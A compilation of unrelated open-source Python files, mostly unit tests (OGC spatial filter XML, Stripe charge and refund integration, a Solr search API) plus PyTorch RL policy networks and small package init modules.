            '</gml:Envelope></ogc:Within>')

    def test_within_nogeom(self):
        """Test the Within spatial filter without setting a geometry column.

        Test whether a RuntimeError is raised.
        """
        within = Within(Box(94720, 186910, 112220, 202870))

        with pytest.raises(RuntimeError):
            within.toXML()

    def test_intersects_box(self):
        """Test the Intersects spatial filter with a Box location.

        Test whether the generated XML is correct.
        """
        intersects = Intersects(Box(94720, 186910, 112220, 202870))
        intersects.set_geometry_column('geom')
        xml = intersects.toXML()

        assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
            '<ogc:Intersects><ogc:PropertyName>geom</ogc:PropertyName>'
            '<gml:Envelope srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
            '<gml:lowerCorner>94720.000000 186910.000000</gml:lowerCorner>'
            '<gml:upperCorner>112220.000000 202870.000000</gml:upperCorner>'
            '</gml:Envelope></ogc:Intersects>')

    def test_intersects_nogeom(self):
        """Test the Intersects spatial filter without setting a geometry
        column.

        Test whether a RuntimeError is raised.
        """
        intersects = Intersects(Box(94720, 186910, 112220, 202870))

        with pytest.raises(RuntimeError):
            intersects.toXML()


class TestLocationFilters(object):
    """Class grouping tests for the AbstractLocationFilter subtypes."""

    def test_withindistance_point(self):
        """Test the WithinDistance spatial filter with a Point location.

        Test whether the generated XML is correct.
        """
        withindistance = WithinDistance(Point(150000, 150000), 100)
        withindistance.set_geometry_column('geom')
        xml = withindistance.toXML()

        assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
            '<ogc:DWithin><ogc:PropertyName>geom</ogc:PropertyName>'
            '<gml:Point srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
            '<gml:pos>150000.000000 150000.000000</gml:pos></gml:Point>'
            '<gml:Distance units="meter">100.000000</gml:Distance>'
            '</ogc:DWithin>')

    def test_withindistance_point_named_args(self):
        """Test the WithinDistance spatial filter with a Point location.

        Test whether the generated XML is correct.
        """
        withindistance = WithinDistance(location=Point(150000, 150000),
                                        distance=100, distance_unit='meter')
        withindistance.set_geometry_column('geom')
        xml = withindistance.toXML()

        assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
            '<ogc:DWithin><ogc:PropertyName>geom</ogc:PropertyName>'
            '<gml:Point srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
            '<gml:pos>150000.000000 150000.000000</gml:pos></gml:Point>'
            '<gml:Distance units="meter">100.000000</gml:Distance>'
            '</ogc:DWithin>')

    def test_withindistance_nogeom(self):
        """Test the WithinDistance spatial filter without setting a geometry
        column.

        Test whether a RuntimeError is raised.
        """
        withindistance = WithinDistance(Point(150000, 150000), 100)

        with pytest.raises(RuntimeError):
            withindistance.toXML()

    def test_withindistance_point_wgs84(self):
        """Test the WithinDistance spatial filter with a Point location
        using WGS84 coordinates.

        Test whether the generated XML is correct.
        """
        withindistance = WithinDistance(Point(51.1270, 3.8071, epsg=4326), 100)
        withindistance.set_geometry_column('geom')
        xml = withindistance.toXML()

        assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
            '<ogc:DWithin><ogc:PropertyName>geom</ogc:PropertyName>'
            '<gml:Point srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#4326">'
            '<gml:pos>51.127000 3.807100</gml:pos></gml:Point>'
            '<gml:Distance units="meter">100.000000</gml:Distance>'
            '</ogc:DWithin>')


class TestLocationFilterExpressions(object):
    """Class grouping tests for expressions with spatial filters."""

    def test_point_and_box(self):
        """Test a location filter expression using a Within(Box) and a
        WithinDistance(Point) filter.

        Test whether the generated XML is correct.
        """
        point_and_box = And([WithinDistance(Point(150000, 150000), 100),
                             Within(Box(94720, 186910, 112220, 202870))])
        xml = set_geometry_column(point_and_box, 'geom')

        assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
            '<ogc:And><ogc:DWithin><ogc:PropertyName>geom</ogc:PropertyName'
            '><gml:Point srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370"><gml'
            ':pos>150000.000000 '
            '150000.000000</gml:pos></gml:Point><gml:Distance '
            'units="meter">100.000000</gml:Distance></ogc:DWithin><ogc'
            ':Within><ogc:PropertyName>geom</ogc:PropertyName><gml'
            ':Envelope srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370"><gml'
            ':lowerCorner>94720.000000 '
            '186910.000000</gml:lowerCorner><gml:upperCorner>112220.000000 '
            '202870.000000</gml:upperCorner></gml:Envelope></ogc:Within'
            '></ogc:And>')

    def test_box_or_box(self):
        """Test a location filter expression using an Intersects(Box) and a
        Within(Box) filter.

        Test whether the generated XML is correct.
        """
        box_or_box = Or([
            Intersects(Box(50.9850, 3.6214, 51.1270, 3.8071, epsg=4326)),
            Within(Box(94720, 186910, 112220, 202870))])
        xml = set_geometry_column(box_or_box, 'geom')

        assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
            '<ogc:Or><ogc:Intersects><ogc:PropertyName>geom</ogc'
            ':PropertyName><gml:Envelope srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#4326"><gml'
            ':lowerCorner>50.985000 '
            '3.621400</gml:lowerCorner><gml:upperCorner>51.127000 '
            '3.807100</gml:upperCorner></gml:Envelope></ogc:Intersects><ogc'
            ':Within><ogc:PropertyName>geom</ogc:PropertyName><gml:Envelope '
            'srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370"><gml'
            ':lowerCorner>94720.000000 '
            '186910.000000</gml:lowerCorner><gml:upperCorner>112220.000000 '
            '202870.000000</gml:upperCorner></gml:Envelope></ogc:Within'
            '></ogc:Or>')

    def test_recursive(self):
        """Test a location filter expression using a recursive expression
        with And(Not(WithinDistance(Point))) filters.

        Test whether the generated XML is correct.
        """
        point_and_box = And([Not([WithinDistance(Point(150000, 150000), 100)]),
                             Within(Box(94720, 186910, 112220, 202870))])
        xml = set_geometry_column(point_and_box, 'geom')

        assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
            '<ogc:And><ogc:Not><ogc:DWithin><ogc:PropertyName>geom</ogc'
            ':PropertyName><gml:Point srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370"><gml'
            ':pos>150000.000000 '
            '150000.000000</gml:pos></gml:Point><gml:Distance '
            'units="meter">100.000000</gml:Distance></ogc:DWithin></ogc:Not'
            '><ogc:Within><ogc:PropertyName>geom</ogc:PropertyName><gml'
            ':Envelope srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370"><gml'
            ':lowerCorner>94720.000000 '
            '186910.000000</gml:lowerCorner><gml:upperCorner>112220.000000 '
            '202870.000000</gml:upperCorner></gml:Envelope></ogc:Within'
            '></ogc:And>')
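Every assertion in this suite funnels through a `clean_xml` helper defined elsewhere in the test package. As a rough stand-in (an assumption for illustration, not the project's actual implementation), a helper that collapses whitespace between adjacent tags could look like:

```python
import re


def clean_xml(xml_string):
    """Collapse whitespace between adjacent tags so serialized XML strings
    compare reliably regardless of pretty-printing or indentation."""
    return re.sub(r'>\s+<', '><', xml_string.strip())


clean_xml('<ogc:And>\n  <ogc:Not/>\n</ogc:And>')  # '<ogc:And><ogc:Not/></ogc:And>'
```

With such a helper, both sides of each `assert` can be written with arbitrary line breaks without affecting the comparison.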

# File: common/policies.py
# Repo: r-salas/minimal-rl (MIT)
#
#
#
# Policies
#
#

import torch
import gym.spaces
import torch.nn as nn


class QNetworkDiscretePolicy(nn.Module):

    def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Discrete):
        super().__init__()

        self.fc = nn.Sequential(
            nn.Linear(observation_space.shape[0], 64),
            nn.ReLU(),
            nn.Linear(64, 64),
            nn.ReLU(),
            nn.Linear(64, action_space.n)
        )

    def forward(self, obs):
        return self.fc(obs)


class ActorCriticDiscretePolicy(nn.Module):

    def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Discrete):
        super().__init__()

        self.common = nn.Sequential(
            nn.Linear(observation_space.shape[0], 64),
            nn.ReLU(),
            nn.Linear(64, 64),
            nn.ReLU(),
        )

        self.actor = nn.Linear(64, action_space.n)
        self.critic = nn.Linear(64, 1)

    def forward(self, obs):
        x = self.common(obs)
        return self.critic(x), self.actor(x)


class ActorDiscretePolicy(nn.Module):

    def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Discrete):
        super().__init__()

        self.fc = nn.Sequential(
            nn.Linear(observation_space.shape[0], 64),
            nn.ReLU(),
            nn.Linear(64, 64),
            nn.ReLU(),
            nn.Linear(64, action_space.n)  # logits
        )

    def forward(self, obs):
        x = self.fc(obs)
        return x


class ActorContinousPolicy(nn.Module):

    def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Box):
        super().__init__()

        self.fc = nn.Sequential(
            nn.Linear(observation_space.shape[0], 64),
            nn.ReLU(),
            nn.Linear(64, 64),
            nn.ReLU(),
            nn.Linear(64, action_space.shape[0]),
        )

    def forward(self, obs):
        x = self.fc(obs)
        x = torch.tanh(x)  # squash actions into [-1, 1]
        return x


class CriticDiscretePolicy(nn.Module):

    def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Discrete):
        super().__init__()

        # A Discrete space has an empty shape, so `action_space.shape[0]`
        # would raise IndexError: the action enters as a single scalar index
        # and the critic outputs one Q-value for the (obs, action) pair.
        self.fc = nn.Sequential(
            nn.Linear(observation_space.shape[0] + 1, 64),
            nn.ReLU(),
            nn.Linear(64, 64),
            nn.ReLU(),
            nn.Linear(64, 1)
        )

    def forward(self, obs, action):
        if obs.ndim < 2:
            obs = obs.unsqueeze(-1)

        if action.ndim < 2:
            action = action.unsqueeze(-1)

        x = torch.cat([obs, action], 1)
        x = self.fc(x)
        return x


class CriticContinousPolicy(nn.Module):

    def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Box):
        super().__init__()

        self.fc = nn.Sequential(
            nn.Linear(observation_space.shape[0] + action_space.shape[0], 64),
            nn.ReLU(),
            nn.Linear(64, 64),
            nn.ReLU(),
            nn.Linear(64, 1),
        )

    def forward(self, obs: torch.Tensor, action: torch.Tensor):
        if obs.ndim < 2:
            obs = obs.unsqueeze(-1)

        if action.ndim < 2:
            action = action.unsqueeze(-1)

        x = torch.cat([obs, action], 1)
        x = self.fc(x)
        return x
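As a sketch of how one of these modules is wired up at runtime (a standalone illustration, not part of the repo): the policies only read `.shape` and `.n` from the space objects, so simple stand-ins can replace real `gym` spaces, and `ActorCriticDiscretePolicy` is restated here so the snippet runs on its own.

```python
import torch
import torch.nn as nn
from types import SimpleNamespace


class ActorCriticDiscretePolicy(nn.Module):
    # Restated from the file above so this sketch is self-contained.
    def __init__(self, observation_space, action_space):
        super().__init__()
        self.common = nn.Sequential(
            nn.Linear(observation_space.shape[0], 64), nn.ReLU(),
            nn.Linear(64, 64), nn.ReLU(),
        )
        self.actor = nn.Linear(64, action_space.n)
        self.critic = nn.Linear(64, 1)

    def forward(self, obs):
        x = self.common(obs)
        return self.critic(x), self.actor(x)


# Only .shape and .n are read, so plain stand-ins replace real gym spaces.
obs_space = SimpleNamespace(shape=(4,))  # CartPole-like: 4 observation dims
act_space = SimpleNamespace(n=2)         # two discrete actions

policy = ActorCriticDiscretePolicy(obs_space, act_space)
value, logits = policy(torch.zeros(1, 4))  # batch of one observation
print(value.shape, logits.shape)  # torch.Size([1, 1]) torch.Size([1, 2])
```

The critic head returns one state value per batch row while the actor head returns one logit per discrete action, which is the split the two-headed layout above encodes.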

# File: os_v4_hek/defs/shpp.py
# Repo: holy-crust/reclaimer (MIT)
from ...os_v3_hek.defs.shpp import *

# File: graphical_models/classes/interventions/__init__.py
# Repo: vishalbelsare/graphical_models (BSD-3-Clause)
from .interventions import *

# File: extra_tests/cffi_tests/embedding/test_performance.py
# Repo: nanjekyejoannah/pypy (Apache-2.0, OpenSSL)
# Generated by pypy/tool/import_cffi.py
import sys

from extra_tests.cffi_tests.embedding.test_basic import EmbeddingTests

if sys.platform == 'win32':
    import pytest
    pytestmark = pytest.mark.skip("written with POSIX functions")


class TestPerformance(EmbeddingTests):

    def test_perf_single_threaded(self):
        perf_cffi = self.prepare_module('perf')
        self.compile('perf-test', [perf_cffi], opt=True)
        output = self.execute('perf-test')
        print('='*79)
        print(output.rstrip())
        print('='*79)

    def test_perf_in_1_thread(self):
        perf_cffi = self.prepare_module('perf')
        self.compile('perf-test', [perf_cffi], opt=True, threads=True,
                     defines={'PTEST_USE_THREAD': '1'})
        output = self.execute('perf-test')
        print('='*79)
        print(output.rstrip())
        print('='*79)

    def test_perf_in_2_threads(self):
        perf_cffi = self.prepare_module('perf')
        self.compile('perf-test', [perf_cffi], opt=True, threads=True,
                     defines={'PTEST_USE_THREAD': '2'})
        output = self.execute('perf-test')
        print('='*79)
        print(output.rstrip())
        print('='*79)

    def test_perf_in_4_threads(self):
        perf_cffi = self.prepare_module('perf')
        self.compile('perf-test', [perf_cffi], opt=True, threads=True,
                     defines={'PTEST_USE_THREAD': '4'})
        output = self.execute('perf-test')
        print('='*79)
        print(output.rstrip())
        print('='*79)

    def test_perf_in_8_threads(self):
        perf_cffi = self.prepare_module('perf')
        self.compile('perf-test', [perf_cffi], opt=True, threads=True,
                     defines={'PTEST_USE_THREAD': '8'})
        output = self.execute('perf-test')
        print('='*79)
        print(output.rstrip())
        print('='*79)

# File: entmoot/__init__.py
# Repo: cornelius-braun/entmoot (BSD-3-Clause)
from .optimizer import Optimizer
from .optimizer import entmoot_minimize
from .space import Space
from .benchmarks import *

__all__ = (
    "Optimizer",  # trailing comma required: ("Optimizer") alone is a plain str
)
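A gotcha worth remembering when a module advertises a single export this way: parentheses alone do not create a tuple, so a lone string in parentheses is still just a string. A quick check:

```python
# A parenthesized string is still a string; the trailing comma makes a tuple.
single = ("Optimizer")
tup = ("Optimizer",)
print(type(single).__name__, type(tup).__name__)  # str tuple
```

A single-string `__all__` often goes unnoticed because iterating a string yields characters, which tools may silently treat as (nonexistent) export names.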

# File: files/test_app/artifactory/artifactory.py
# Repo: jpnewman/jpnewman_ansible_elk (MIT)
from .nuget_package import NugetPackages


class Artifactory(object):

    def __init__(self):
        self.nuget_package_obj = NugetPackages()

    def create_all_packages(self):
        self.nuget_package_obj.create_all()

# File: havok_py/utils/__init__.py
# Repo: yangjinhui11/havok_ml (MIT)
from .simulations import simulate_lorenz
from .simulations import simulate_rossler
from .simulations import simulate_vanderpol_oscillator
from .simulations import simulate_duffing_oscillator
from .simulations import simulate_coupled_vdp
from .simulations import simulate_coupled_vdp_lorenz
from .simulations import simulate_lsim
from .simulations import lorenz
from .dmd import DMD
from .sindy import SINDy
from .utils import hankel_matrix

# File: venv/lib/python3.8/site-packages/numpy/f2py/tests/test_callback.py
# Repo: Retraces/UkraineBot (MIT)
# Note: the dataset captured this vendored file as a pip cache symlink
# target rather than Python source:
# /home/runner/.cache/pip/pool/eb/60/f3/07eb813b3b488199a158453d093b48cecec464b896f6fa3a2cad762040
"MIT"
] | 3 | 2017-09-03T17:17:44.000Z | 2017-12-10T12:26:46.000Z | wemos-d1-mini/main.py | flashypepo/myMicropython-Examples | b2b63df865b5ad471b351ca5f279135025859f5d | [
"MIT"
] | null | null | null | wemos-d1-mini/main.py | flashypepo/myMicropython-Examples | b2b63df865b5ad471b351ca5f279135025859f5d | [
"MIT"
] | 2 | 2017-10-01T01:10:55.000Z | 2018-07-15T19:49:29.000Z | # main.py - select startup program
import scroller # OLED-demo
import sht30_demo # SHT30 shield demo
#TODO: show temperature and humidity on OLED display
| 26.666667 | 53 | 0.7625 | 23 | 160 | 5.26087 | 0.782609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030769 | 0.1875 | 160 | 5 | 54 | 32 | 0.9 | 0.69375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |

# File: brambling/tests/integration/test_stripe.py
# Repo: j-po/django-brambling (BSD-3-Clause)
from decimal import Decimal

from django.test import TestCase
import stripe

from brambling.models import Event, Transaction
from brambling.tests.factories import EventFactory, OrderFactory
from brambling.utils.payment import stripe_prep, stripe_charge, stripe_refund


class StripeTestCase(TestCase):

    def test_charge__no_customer(self):
        event = EventFactory(api_type=Event.TEST,
                             application_fee_percent=Decimal('2.5'))
        order = OrderFactory(event=event)
        self.assertTrue(event.stripe_connected())

        stripe_prep(Event.TEST)
        stripe.api_key = event.organization.stripe_test_access_token
        token = stripe.Token.create(
            card={
                "number": '4242424242424242',
                "exp_month": 12,
                "exp_year": 2050,
                "cvc": '123'
            },
        )
        charge = stripe_charge(
            token,
            amount=42.15,
            order=order,
            event=event,
        )
        self.assertIsInstance(charge.balance_transaction, stripe.StripeObject)
        self.assertEqual(charge.balance_transaction.object, "balance_transaction")
        self.assertEqual(len(charge.balance_transaction.fee_details), 2)
        self.assertEqual(charge.metadata,
                         {'order': order.code, 'event': event.name})

        txn = Transaction.from_stripe_charge(charge, api_type=event.api_type,
                                             event=event)
        # 42.15 * 0.025 = 1.05
        self.assertEqual(txn.application_fee, Decimal('1.05'))
        # (42.15 * 0.029) + 0.30 = 1.52
        self.assertEqual(txn.processing_fee, Decimal('1.52'))

        refund = stripe_refund(
            order=order,
            event=event,
            payment_id=txn.remote_id,
            amount=txn.amount
        )
        self.assertEqual(refund['refund'].metadata,
                         {'order': order.code, 'event': event.name})

        refund_txn = Transaction.from_stripe_refund(refund,
                                                    api_type=event.api_type,
                                                    related_transaction=txn,
                                                    event=event)
        self.assertEqual(refund_txn.amount, -1 * txn.amount)
        self.assertEqual(refund_txn.application_fee, -1 * txn.application_fee)
        self.assertEqual(refund_txn.processing_fee, -1 * txn.processing_fee)

    def test_charge__customer(self):
        event = EventFactory(api_type=Event.TEST,
                             application_fee_percent=Decimal('2.5'))
        order = OrderFactory(event=event)
        self.assertTrue(event.stripe_connected())

        stripe_prep(Event.TEST)
        token = stripe.Token.create(
            card={
                "number": '4242424242424242',
                "exp_month": 12,
                "exp_year": 2050,
                "cvc": '123'
            },
        )
        customer = stripe.Customer.create(
            card=token,
        )
        card = customer.default_card
        charge = stripe_charge(
            card,
            amount=42.15,
            event=event,
            order=order,
            customer=customer
        )
        self.assertIsInstance(charge.balance_transaction, stripe.StripeObject)
        self.assertEqual(charge.balance_transaction.object, "balance_transaction")
        self.assertEqual(len(charge.balance_transaction.fee_details), 2)
        self.assertEqual(charge.metadata,
                         {'order': order.code, 'event': event.name})

        txn = Transaction.from_stripe_charge(charge, api_type=event.api_type,
                                             event=event)
        # 42.15 * 0.025 = 1.05
        self.assertEqual(txn.application_fee, Decimal('1.05'))
        # (42.15 * 0.029) + 0.30 = 1.52
        self.assertEqual(txn.processing_fee, Decimal('1.52'))

        refund = stripe_refund(
            order=order,
            event=event,
            payment_id=txn.remote_id,
            amount=txn.amount
        )
        self.assertEqual(refund['refund'].metadata,
                         {'order': order.code, 'event': event.name})

        refund_txn = Transaction.from_stripe_refund(refund,
                                                    api_type=event.api_type,
                                                    related_transaction=txn,
                                                    event=event)
        self.assertEqual(refund_txn.amount, -1 * txn.amount)
        self.assertEqual(refund_txn.application_fee, -1 * txn.application_fee)
        self.assertEqual(refund_txn.processing_fee, -1 * txn.processing_fee)

# File: backend/app/views/insert_parts_on_backbones/__init__.py
# Repo: Edinburgh-Genome-Foundry/CUBA (MIT)
from .InsertPartsOnBackbones import InsertPartsOnBackbonesView

# File: jmdict/__init__.py
# Repo: agent-whisper/jmdict-xml-wrapper (MIT)
from .xml.models import JMDict
from .xml.engine import JMDictEngine

# File: configs/oscar/oscar_gqa.py
# Repo: linxi1158/iMIX (Apache-2.0)
_base_ = [
    '../_base_/models/oscar/oscar_gqa_config.py',
    '../_base_/datasets/oscar/oscar_gqa_dataset.py',
    '../_base_/default_runtime.py',
]
97aecfeca586e462c94b489ef6b1e8c429068da8 | 9,639 | py | Python | sleuth_backend/tests/test_views.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 12 | 2017-09-17T02:14:35.000Z | 2022-01-09T10:14:59.000Z | sleuth_backend/tests/test_views.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 92 | 2017-09-16T23:50:45.000Z | 2018-01-02T01:56:33.000Z | sleuth_backend/tests/test_views.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 5 | 2017-12-26T01:47:36.000Z | 2021-12-31T11:15:07.000Z | import json
import pysolr
from django.test import TestCase
from django.http import HttpResponse
from unittest.mock import MagicMock, patch
from sleuth_backend.views.views import cores, search, getdocument
class MockGet(object):
def __init__(self, params):
self.params = params
def get(self, param, default):
return self.params[param] if param in self.params else default
class MockRequest(object):
def __init__(self, method, get=None):
self.method = method
if get is not None:
self.GET = get
class TestAPI(TestCase):
@patch('sleuth_backend.solr.connection.SolrConnection.core_names')
def test_cores_without_get(self, mock_core_names):
mock_core_names.return_value = ['core1', 'core2']
mock_request = MockRequest('POST')
result = cores(mock_request)
self.assertEqual(result.status_code, 405)
@patch('sleuth_backend.solr.connection.SolrConnection.core_names')
def test_cores_with_get(self, mock_core_names):
mock_core_names.return_value = ['core1', 'core2']
mock_request = MockRequest('GET')
result = cores(mock_request)
self.assertEqual(result.status_code, 200)
self.assertEqual(result.content, b'["core1", "core2"]')
@patch('sleuth_backend.solr.connection.SolrConnection.query')
def test_apis_without_get(self, mock_query):
mock_query.return_value = {}
mock_request = MockRequest('POST')
result = search(mock_request)
self.assertEqual(result.status_code, 405)
result = getdocument(mock_request)
self.assertEqual(result.status_code, 405)
@patch('sleuth_backend.solr.connection.SolrConnection.query')
def test_apis_without_params(self, mock_query):
mock_query.return_value = {}
mock_request = MockRequest('GET', get=MockGet({}))
result = search(mock_request)
response_body = json.loads(result.content)
self.assertEqual(result.status_code, 400)
self.assertEqual(response_body['errorType'], 'INVALID_SEARCH_REQUEST')
result = getdocument(mock_request)
response_body = json.loads(result.content)
self.assertEqual(result.status_code, 400)
self.assertEqual(response_body['errorType'], 'INVALID_GETDOCUMENT_REQUEST')

    @patch('sleuth_backend.solr.connection.SolrConnection.core_names')
    @patch('sleuth_backend.solr.connection.SolrConnection.query')
    def test_apis_with_valid_request(self, mock_query, mock_cores):
        mock_cores.return_value = ['genericPage', 'redditPost', 'courseItem']
        # genericPage search
        mock_query.return_value = {
            "type": "genericPage",
            "response": {
                "numFound": 1,
                "start": 0,
                "docs": [
                    {
                        "id": ["www.cool.com"],
                        "description": ["Nice one dude"],
                    }
                ]
            },
            "highlighting": {
                "www.cool.com": {
                    "content": ['Nice one dude']
                }
            }
        }
        params = {
            'q': 'somequery',
            'type': 'genericPage',
            'return': 'content'
        }
        mock_request = MockRequest('GET', get=MockGet(params))
        result = search(mock_request)
        self.assertEqual(result.status_code, 200)
        mock_response = mock_query.return_value
        mock_response['response']['docs'][0]['id'] = 'www.cool.com'
        mock_response['response']['docs'][0]['updatedAt'] = ''
        mock_response['response']['docs'][0]['name'] = ''
        mock_response['response']['docs'][0]['description'] = 'Nice one dude'
        self.maxDiff = None
        self.assertEqual(
            json.loads(result.content.decode('utf-8')),
            {
                "data": [{
                    "type": "genericPage",
                    "response": {
                        "numFound": 1,
                        "start": 0,
                        "docs": [{
                            "id": "www.cool.com",
                            "description": "Nice one dude",
                            "updatedAt": "",
                            "name": "",
                            "content": ""
                        }]
                    },
                    "highlighting": {"www.cool.com": {"content": ["Nice one dude"]}}
                }],
                "request": {
                    "query": "somequery",
                    "types": ["genericPage"],
                    "return_fields": ["id", "updatedAt", "name", "description", "content"],
                    "state": ""
                }
            }
        )
        # multicore search
        mock_cores.return_value = ['courseItem', 'courseItem']
        params = {'q': 'somequery'}
        mock_request = MockRequest('GET', get=MockGet(params))
        result = search(mock_request)
        self.assertEqual(result.status_code, 200)
        course_item = {
            'type': 'courseItem',
            'response': {
                'numFound': 1,
                'start': 0,
                'docs': [{'id': 'www.cool.com', 'description': 'Nice one dude',
                          'updatedAt': '', 'name': '', 'content': ''}]
            },
            'highlighting': {'www.cool.com': {'content': ['Nice one dude']}}
        }
        self.assertEqual(
            json.loads(result.content.decode('utf-8')),
            {
                'data': [course_item, course_item],
                'request': {
                    'query': 'somequery',
                    'types': ['courseItem', 'courseItem'],
                    'return_fields': ['id', 'updatedAt', 'name', 'description'],
                    'state': ''
                }
            }
        )
        # redditPost search
        mock_cores.return_value = ['genericPage', 'redditPost', 'courseItem']
        mock_query.return_value['type'] = 'redditPost'
        mock_query.return_value['highlighting']['www.cool.com'] = {'content': ['Nice']}
        params = {'q': 'somequery', 'type': 'redditPost'}
        mock_request = MockRequest('GET', get=MockGet(params))
        result = search(mock_request)
        self.assertEqual(result.status_code, 200)
        # getdocument
        params = {
            'id': 'somequery',
            'type': 'genericPage',
            'return': 'content'
        }
        mock_request = MockRequest('GET', get=MockGet(params))
        result = getdocument(mock_request)
        self.assertEqual(result.status_code, 200)
        self.assertEqual(
            json.loads(result.content.decode('utf-8')),
            {
                'data': {
                    'type': 'genericPage',
                    'doc': {'id': 'www.cool.com', 'description': 'Nice one dude',
                            'updatedAt': '', 'name': '', 'content': ''}
                },
                'request': {
                    'query': 'somequery',
                    'types': ['genericPage'],
                    'return_fields': ['id', 'updatedAt', 'name', 'description', 'content'],
                    'state': ''
                }
            }
        )
        mock_query.return_value['response']['numFound'] = 0
        mock_request = MockRequest('GET', get=MockGet(params))
        result = getdocument(mock_request)
        self.assertEqual(result.status_code, 404)

    @patch('sleuth_backend.solr.connection.SolrConnection.core_names')
    @patch('sleuth_backend.solr.connection.SolrConnection.query')
    def test_apis_with_error_response(self, mock_query, mock_cores):
        mock_cores.return_value = ['test']
        # Solr response error
        mock_query.return_value = {
            "error": {
                "msg": "org.apache.solr.search.SyntaxError",
                "code": 400,
            }
        }
        params = {
            'q': 'somequery',
            'type': 'test',
        }
        expected_response = json.dumps({
            "message": "org.apache.solr.search.SyntaxError on core test",
            "errorType": "SOLR_SEARCH_ERROR",
        })
        mock_request = MockRequest('GET', get=MockGet(params))
        result = search(mock_request)
        self.assertEqual(result.status_code, 400)
        self.assertEqual(result.content.decode("utf-8"), expected_response)
        mock_request = MockRequest('GET', get=MockGet({'id': 'query', 'type': 'test'}))
        result = getdocument(mock_request)
        self.assertEqual(result.status_code, 400)
        self.assertEqual(result.content.decode("utf-8"), expected_response)
        # pysolr error
        mock_query.side_effect = pysolr.SolrError()
        mock_request = MockRequest('GET', get=MockGet(params))
        result = search(mock_request)
        self.assertEqual(result.status_code, 400)
        mock_request = MockRequest('GET', get=MockGet({'id': 'query'}))
        result = getdocument(mock_request)
        self.assertEqual(result.status_code, 400)
        # Key error
        mock_query.side_effect = KeyError()
        mock_request = MockRequest('GET', get=MockGet(params))
        result = search(mock_request)
        self.assertEqual(result.status_code, 500)
        mock_request = MockRequest('GET', get=MockGet({'id': 'query'}))
        result = getdocument(mock_request)
        self.assertEqual(result.status_code, 500)
        # Value error
        mock_query.side_effect = ValueError()
        mock_request = MockRequest('GET', get=MockGet(params))
        result = search(mock_request)
        self.assertEqual(result.status_code, 500)
        mock_request = MockRequest('GET', get=MockGet({'id': 'query'}))
        result = getdocument(mock_request)
        self.assertEqual(result.status_code, 500)
        # Invalid param error
        params = {
            'q': 'somequery',
            'type': 'asdlialisfas',
        }
        mock_request = MockRequest('GET', get=MockGet(params))
        result = search(mock_request)
        self.assertEqual(result.status_code, 400)
        mock_request = MockRequest('GET', get=MockGet({'id': 'query', 'type': 'asdf'}))
        result = getdocument(mock_request)
        self.assertEqual(result.status_code, 400)
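The tests above drive every case through `unittest.mock.patch`, switching the mocked `SolrConnection.query` between a canned `return_value` and a raised `side_effect`. A minimal self-contained sketch of that pattern, using a hypothetical toy class rather than the real `SolrConnection`:

```python
from unittest.mock import patch


class ToyConnection:
    """Hypothetical stand-in for SolrConnection, used only for illustration."""

    def query(self):
        raise RuntimeError("would hit the network")


with patch.object(ToyConnection, "query") as mock_query:
    # return_value: the mocked method answers with a canned response.
    mock_query.return_value = {"docs": []}
    assert ToyConnection().query() == {"docs": []}

    # side_effect: the mocked method now raises instead of returning.
    mock_query.side_effect = ValueError()
    try:
        ToyConnection().query()
        raised = False
    except ValueError:
        raised = True
    assert raised
```

Outside the `with` block the original method is restored, which is why each test method re-patches via its own decorator.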

# koocook_core/management/commands/_scrape/__init__.py
# (KooCook/koocook-dj, BSD-3-Clause)
from . import allrecipes
from . import epicurious

# example/asr/text.py
# (rosinality/imputer-pytorch, MIT)
import re
re_whitespace = re.compile(r'\s+')


def collapse_whitespace(text):
    return re_whitespace.sub(' ', text)
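For reference, `collapse_whitespace` folds any run of whitespace (spaces, tabs, newlines) into a single space. A runnable usage sketch that restates the two definitions above so it is self-contained:

```python
import re

re_whitespace = re.compile(r'\s+')


def collapse_whitespace(text):
    # Replace every maximal run of whitespace characters with one space.
    return re_whitespace.sub(' ', text)


# Mixed tabs, newlines, and repeated spaces all collapse to single spaces.
print(collapse_whitespace("imputer\t models \n for  asr"))  # -> imputer models for asr
```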
